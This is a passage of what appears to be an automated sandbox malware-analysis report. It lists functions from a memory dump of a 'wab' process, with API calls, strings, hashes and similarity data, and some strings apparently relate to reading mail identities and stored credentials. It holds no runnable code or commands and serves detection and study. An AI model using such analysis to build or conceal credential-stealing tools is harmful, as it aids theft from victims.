                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1992179935-0
                                                                                                                • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                                • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • too many SQL variables, xrefs: 0042C6FD
                                                                                                                • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                • API String ID: 2221118986-515162456
                                                                                                                • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                • memset.MSVCRT ref: 004026AD
                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                  • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1593657333-0
                                                                                                                • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040C922
                                                                                                                • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$MenuPostSendStringmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3798638045-0
                                                                                                                • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                                                                                                • strlen.MSVCRT ref: 0040B60B
                                                                                                                • atoi.MSVCRT ref: 0040B619
                                                                                                                • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4107816708-0
                                                                                                                • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                • String ID:
                                                                                                                • API String ID: 1886415126-0
                                                                                                                • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlen
                                                                                                                • String ID: >$>$>
                                                                                                                • API String ID: 39653677-3911187716
                                                                                                                • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: @
                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040796E Relevance: 6.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • strlen.MSVCRT ref: 0040797A
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                                                                                                                  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                  • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                                                                                                                  • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                                                                                                                • memcpy.MSVCRT ref: 004079DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1171893557-0
                                                                                                                • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strcmpi
                                                                                                                • String ID: C@$mail.identity
                                                                                                                • API String ID: 1439213657-721921413
                                                                                                                • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00406640
                                                                                                                  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                                                                                                                • memcmp.MSVCRT ref: 00406672
                                                                                                                • memcpy.MSVCRT ref: 00406695
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset$memcmp
                                                                                                                • String ID: Ul@
                                                                                                                • API String ID: 270934217-715280498
                                                                                                                • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                                                • sprintf.MSVCRT ref: 0040B929
                                                                                                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                • sprintf.MSVCRT ref: 0040B953
                                                                                                                • _mbscat.MSVCRT ref: 0040B966
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 203655857-0
                                                                                                                • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ADC5 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040ADE8
                                                                                                                • memset.MSVCRT ref: 0040ADFE
                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                • sprintf.MSVCRT ref: 0040AE28
                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                • String ID: </%s>
                                                                                                                • API String ID: 3699762281-259020660
                                                                                                                • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                                                • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                                                                                • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                                                                                • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                Strings
                                                                                                                • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                • String ID: recovered %d pages from %s
                                                                                                                • API String ID: 985450955-1623757624
                                                                                                                • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _ultoasprintf
                                                                                                                • String ID: %s %s %s
                                                                                                                • API String ID: 432394123-3850900253
                                                                                                                • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409919
                                                                                                                • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendmemset
                                                                                                                • String ID: N\@
                                                                                                                • API String ID: 568519121-3851889168
                                                                                                                • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                                                • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                • sprintf.MSVCRT ref: 0040909B
                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                • String ID: menu_%d
                                                                                                                • API String ID: 1129539653-2417748251
                                                                                                                • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _msizerealloc
                                                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                                                • API String ID: 2713192863-2134078882
                                                                                                                • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                • strrchr.MSVCRT ref: 00409808
                                                                                                                • _mbscat.MSVCRT ref: 0040981D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName_mbscatstrrchr
                                                                                                                • String ID: _lng.ini
                                                                                                                • API String ID: 3334749609-1948609170
                                                                                                                • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _mbscpy.MSVCRT ref: 004070EB
                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                • _mbscat.MSVCRT ref: 004070FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
